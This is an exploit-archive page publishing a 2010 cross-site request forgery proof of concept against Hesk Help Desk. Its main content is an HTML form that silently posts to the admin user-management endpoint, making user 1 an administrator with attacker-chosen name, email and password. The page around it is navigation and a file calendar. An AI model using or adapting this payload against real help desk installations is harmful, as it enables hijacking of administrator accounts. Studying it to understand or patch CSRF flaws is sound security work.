exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Hesk Help Desk Cross Site Request Forgery

Hesk Help Desk Cross Site Request Forgery
Posted Jan 14, 2010
Authored by The.Morpheus

Hesk Help Desk suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 9874c8de3232fac3291047fe238475fb386cb0475c6c001211f36969978ef5b4

Hesk Help Desk Cross Site Request Forgery

Change Mirror Download



#############################################################
# Application Name : Help Desk Php Script
# Date : 11.01.2010
# Vulnerable Type : XSRF
# Infection : Admin cookilerini Değiştirilebilinir.
# author : The.Morpheus
# Demo : http://www.hesk.com/demo/admin/


#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >
<h3>The.Morpheus</h3>
<form method="post" action="http://www.hesk.com/demo/admin/manage_users.php?a=edit&id=1">
<input type="text" name="name" size="40" maxlength="50" value="John Doe" /></td>
<input type="text" name="email" size="40" maxlength="255" value="john@doe.com<mailto:john@doe.com>" /></td>
<input type="text" name="user" size="40" maxlength="20" value="Demo" /></td>
<input type="password" name="newpass" size="40" maxlength="20" /></td>
<input type="password" name="newpass2" size="40" maxlength="20" /></td>
<input type="radio" name="isadmin" value="1" onclick="Javascript:hesk_toggleLayerDisplay('options')" checked="checked" /> YES (access to all features and categories)</label><br />
<input type="radio" name="isadmin" value="0" onclick="Javascript:hesk_toggleLayerDisplay('options')" /> NO (you can limit features and categories)</label>
<input type="checkbox" name="categories[]" value="2" checked="checked" /> Support</label><br /><label><input type="checkbox" name="categories[]" value="3" /> Billing</label><br /><label><input type="checkbox" name="categories[]" value="4" /> Advertising</label><br /><label><input type="checkbox" name="categories[]" value="1" /> General</label><br />  
<input type="checkbox" name="features[]" value="can_view_tickets" checked="checked" />View tickets<sup>1</sup></label><br />
<input type="checkbox" name="features[]" value="can_edit_tickets" />Edit ticket replies<sup>1</sup></label><br />
<input type="checkbox" name="features[]" value="can_del_notes" />Delete any ticket notes<sup>1, 2</sup></label><br />
<input type="checkbox" name="features[]" value="can_change_cat" checked="checked" />Change ticket category<sup>1</sup></label><br />
<input type="checkbox" name="features[]" value="can_man_kb" />Manage knowledgebase</label><br />
<input type="checkbox" name="features[]" value="can_man_users" />Manage users</label><br />
<input type="checkbox" name="features[]" value="can_man_cat" />Manage categories</label><br />
<input type="checkbox" name="features[]" value="can_man_canned" />Manage canned responses</label><br />
<input type="checkbox" name="features[]" value="can_man_settings" />Manage help desk settings</label><br />
><input type="checkbox" name="features[]" value="can_add_archive" />Can add tickets to archive</label><br />
<input type="hidden" name="a" value="save" />
<input type="hidden" name="userid" value="1" />
<input type="submit" value="Save changes" class="orangebutton" onmouseover="hesk_btn(this,'orangebuttonover');" onmouseout="hesk_btn(this,'orangebutton');" /></p>
</form>

< -- bug code end of -- >


________________________________
Windows Live: Arkadaşlarınız size e-posta gönderdiklerinde Flickr, Twitter ve Digg güncellemelerinizi öğrenirler.<http://www.microsoft.com/windows/windowslive/see-it-in-action/social-network-basics.aspx?ocid=PID23461::T:WLMTAGL:ON:WL:tr-tr:SI_SB_3:092010>



Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    5 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close